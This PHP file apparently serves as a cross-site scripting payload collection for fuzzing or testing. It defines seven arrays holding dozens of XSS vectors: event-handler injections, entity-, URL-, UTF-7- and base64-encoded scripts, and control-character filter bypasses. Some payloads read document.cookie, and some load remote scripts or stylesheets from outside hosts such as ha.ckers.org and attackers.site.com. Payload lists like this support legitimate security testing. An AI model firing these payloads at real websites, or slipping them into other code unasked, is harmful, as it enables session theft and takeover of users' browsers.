<?php

$XSS_List_1 = [
	"<img src=asdasd onerror=alert(1)>",
	"javascript:onload=alert(1)",
	'>"<IMG DYNSRC="javascript:document.cookie=true;">',
	'>"<BR SIZE="&{document.cookie=true}">',
	"\"><iframe src='' onload=alert('mphone')>",
	"<script>alert('VL')</script>",
	"<iframe src=http://attackers.site.com>",
	"javascript:alert(document.cookie);"
	];


$XSS_List_2 = [
	"javascript:eval(alert(1))",
	"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
	"%5B%24y%3D(%22al%22)%5D%26%26%5B%24z%3D%24y%5D%26%26%5B%24z%2B%3D(%22ert%22)%2B%5B%5D%5D%5BDocDan%3D(%2Fev%2F)%5B-1%5D%2B%24y%5D(%24z).valueOf()(1)%27"
	];


$XSS_List_3 = [
	"<img src=1 href=1 onerror=\"javascript:alert(1)\"></img>", 
	"<audio src=1 href=1 onerror=\"javascript:alert(1)\"></audio>", 
	"<video src=1 href=1 onerror=\"javascript:alert(1)\"></video>", 
	"<body src=1 href=1 onerror=\"javascript:alert(1)\"></body>", 
	"<image src=1 href=1 onerror=\"javascript:alert(1)\"></image>", 
	"<object src=1 href=1 onerror=\"javascript:alert(1)\"></object>", 
	"<script src=1 href=1 onerror=\"javascript:alert(1)\"></script>", 
	"<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>", 
	"<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(1)\"></title onPropertyChange>", 
	"<iframe onLoad iframe onLoad=\"javascript:javascript:alert(1)\"></iframe onLoad>", 
	"<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(1)\"></body onMouseEnter>", 
	"<body onFocus body onFocus=\"javascript:javascript:alert(1)\"></body onFocus>", 
	"<frameset onScroll frameset onScroll=\"javascript:javascript:alert(1)\"></frameset onScroll>", 
	"<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1)\"></script onReadyStateChange>", 
	"<html onMouseUp html onMouseUp=\"javascript:javascript:alert(1)\"></html onMouseUp>", 
	"<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(1)\"></body onPropertyChange>", 
	"<svg onLoad svg onLoad=\"javascript:javascript:alert(1)\"></svg onLoad>", 
	"<body onPageHide body onPageHide=\"javascript:javascript:alert(1)\"></body onPageHide>", 
	"<body onMouseOver body onMouseOver=\"javascript:javascript:alert(1)\"></body onMouseOver>", 
	"<body onUnload body onUnload=\"javascript:javascript:alert(1)\"></body onUnload>", 
	"<body onLoad body onLoad=\"javascript:javascript:alert(1)\"></body onLoad>", 
	"<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1)\"></bgsound onPropertyChange>", 
	"<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(1)\"></html onMouseLeave>", 
	"<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(1)\"></html onMouseWheel>", 
	"<style onLoad style onLoad=\"javascript:javascript:alert(1)\"></style onLoad>", 
	"<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(1)\"></iframe onReadyStateChange>", 
	"<body onPageShow body onPageShow=\"javascript:javascript:alert(1)\"></body onPageShow>", 
	"<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(1)\"></style onReadyStateChange>", 
	"<frameset onFocus frameset onFocus=\"javascript:javascript:alert(1)\"></frameset onFocus>", 
	"<applet onError applet onError=\"javascript:javascript:alert(1)\"></applet onError>", 
	"<marquee onStart marquee onStart=\"javascript:javascript:alert(1)\"></marquee onStart>", 
	"<script onLoad script onLoad=\"javascript:javascript:alert(1)\"></script onLoad>", 
	"<html onMouseOver html onMouseOver=\"javascript:javascript:alert(1)\"></html onMouseOver>", 
	"<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(1)\"></html onMouseEnter>", 
	"<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1)\"></body onBeforeUnload>", 
	"<html onMouseDown html onMouseDown=\"javascript:javascript:alert(1)\"></html onMouseDown>", 
	"<marquee onScroll marquee onScroll=\"javascript:javascript:alert(1)\"></marquee onScroll>", 
	"<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(1)\"></xml onPropertyChange>", 
	"<frameset onBlur frameset onBlur=\"javascript:javascript:alert(1)\"></frameset onBlur>", 
	"<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1)\"></applet onReadyStateChange>", 
	"<svg onUnload svg onUnload=\"javascript:javascript:alert(1)\"></svg onUnload>", 
	"<html onMouseOut html onMouseOut=\"javascript:javascript:alert(1)\"></html onMouseOut>", 
	"<body onMouseMove body onMouseMove=\"javascript:javascript:alert(1)\"></body onMouseMove>", 
	"<body onResize body onResize=\"javascript:javascript:alert(1)\"></body onResize>", 
	"<object onError object onError=\"javascript:javascript:alert(1)\"></object onError>", 
	"<body onPopState body onPopState=\"javascript:javascript:alert(1)\"></body onPopState>", 
	"<html onMouseMove html onMouseMove=\"javascript:javascript:alert(1)\"></html onMouseMove>", 
	"<applet onreadystatechange applet onreadystatechange=\"javascript:javascript:alert(1)\"></applet onreadystatechange>", 
	"<body onpagehide body onpagehide=\"javascript:javascript:alert(1)\"></body onpagehide>", 
	"<svg onunload svg onunload=\"javascript:javascript:alert(1)\"></svg onunload>", 
	"<applet onerror applet onerror=\"javascript:javascript:alert(1)\"></applet onerror>", 
	"<body onkeyup body onkeyup=\"javascript:javascript:alert(1)\"></body onkeyup>", 
	"<body onunload body onunload=\"javascript:javascript:alert(1)\"></body onunload>", 
	"<iframe onload iframe onload=\"javascript:javascript:alert(1)\"></iframe onload>", 
	"<body onload body onload=\"javascript:javascript:alert(1)\"></body onload>", 
	"<html onmouseover html onmouseover=\"javascript:javascript:alert(1)\"></html onmouseover>", 
	"<object onbeforeload object onbeforeload=\"javascript:javascript:alert(1)\"></object onbeforeload>", 
	"<body onbeforeunload body onbeforeunload=\"javascript:javascript:alert(1)\"></body onbeforeunload>", 
	"<body onfocus body onfocus=\"javascript:javascript:alert(1)\"></body onfocus>", 
	"<body onkeydown body onkeydown=\"javascript:javascript:alert(1)\"></body onkeydown>", 
	"<iframe onbeforeload iframe onbeforeload=\"javascript:javascript:alert(1)\"></iframe onbeforeload>", 
	"<iframe src iframe src=\"javascript:javascript:alert(1)\"></iframe src>", 
	"<svg onload svg onload=\"javascript:javascript:alert(1)\"></svg onload>", 
	"<html onmousemove html onmousemove=\"javascript:javascript:alert(1)\"></html onmousemove>", 
	"<body onblur body onblur=\"javascript:javascript:alert(1)\"></body onblur>",
	"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
	"<XSS STYLE=\"behavior: url(xss.htc);\">"
	];



$XSS_List_4 = [
	"<script\x20type=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x3Etype=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x09type=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", 
	"<script\x0Atype=\"text/javascript\">javascript:alert(1);</script>", 
	"'`\"><\x3Cscript>javascript:alert(1)</script>", 
	"'`\"><\x00script>javascript:alert(1)</script>", 
	"\x3Cscript>javascript:alert(1)</script>", 
	"'\"`><script>/* *\x2Fjavascript:alert(1)// */</script>",  
	"<script>javascript:alert(1)</script\x0D", 
	"<script>javascript:alert(1)</script\x0A", 
	"<script>javascript:alert(1)</script\x0B", 
	"<script charset=\"\x22>javascript:alert(1)</script>", 
	"<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->", 
	"--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->", 
	"--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->", 
	"--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->", 
	"--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->", 
	"`\"'><img src='#\x27 onerror=javascript:alert(1)>"
	];


$XSS_List_5 = [
	"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", 
	"<img src=x onerror=\x09\"javascript:alert(1)\">", 
	"<img src=x onerror=\x10\"javascript:alert(1)\">", 
	"<img src=x onerror=\x11\"javascript:alert(1)\">", 
	"<img src=x onerror=\x12\"javascript:alert(1)\">", 
	"<img src=x onerror=\x32\"javascript:alert(1)\">", 
	"<img src=x onerror=\x00\"javascript:alert(1)\">", 
	"<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>", 
	"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", 
	"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", 
	"<title onpropertychange=javascript:alert(1)></title><title title=>", 
	"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", 
	"<!--[if]><script>javascript:alert(1)</script -->", 
	"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", 
	"<script src=\"/\%(jscript)s\"></script>", 
	"<script src=\"\\%(jscript)s\"></script>", 
	"<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object> <object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"javascript:alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>", 
	"<a style=\"-o-link:'javascript:javascript:alert(1)';-o-link-source:current\">X", 
	"<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>", 
	"<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d", 
	"<style>@import \"data:,*%7bx:expression(javascript:alert(1))%7D\";</style>", 
	"<div style=\"list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));\">X", 
	"<div id=d><div style=\"font-family:'sans\27\3B color\3Ared\3B'\">X</div></div> <script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>", 
	"<div style=\"background:url(/f#&#127;oo/;color:red/*/foo.jpg);\">X", 
	"<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X", 
	"<div id=\"x\">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>", 
	"<x style=\"background:url('x&#1;;color:red;/*')\">XXX</x>", 
	"<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>", 
	"<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>", 
	"<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", 
	"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", 
	"<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi", 
	"<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>", 
	"<meta charset=\"mac-farsi\">¼script¾javascript:alert(1)¼/script¾", 
	"X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >", 
	"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", 
	"<IMG SRC=\"javascript:alert('XSS');\">", 
	"<IMG SRC=javascript:alert('XSS')>", 
	"<IMG SRC=JaVaScRiPt:alert('XSS')>", 
	"<IMG SRC=javascript:alert(\"XSS\")>", 
	"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", 
	"<a onmouseover=\"alert(document.cookie)\">xxs link</a>", 
	"<a onmouseover=alert(document.cookie)>xxs link</a>", 
	"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", 
	"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", 
	"<IMG SRC=# onmouseover=\"alert('xxs')\">", 
	"<IMG SRC= onmouseover=\"alert('xxs')\">", 
	"<IMG onmouseover=\"alert('xxs')\">", 
	"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", 
	"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>", 
	"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
	"<form><button formaction=javascript&colon;alert(1)>CLICKME", 
	"<math><a xlink:href=\"//jsfiddle.net/t846h/\">click",
	"javascript:void(document.write('<form method=post ><input type=submit value=transfer /></form>'))"
	];	

$XSS_List_6 = [
	"<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>", 
	"<!-- sample vector --> <*hex2**hex4**hex6**num**chr**urlenc**uni*>",
	"<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe", 
	"<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>", 
	"<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>", 
	"<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>"
];

$XSS_List_7 = [
	"'';!--\"<XSS>=&{()}",
	"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
	&#39;&#88;&#83;&#83;&#39;&#41;>",
	"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
	&#39;&#88;&#83;&#83;&#39;&#41;",
	"¼script¾alert(¢XSS¢)¼/script¾"
];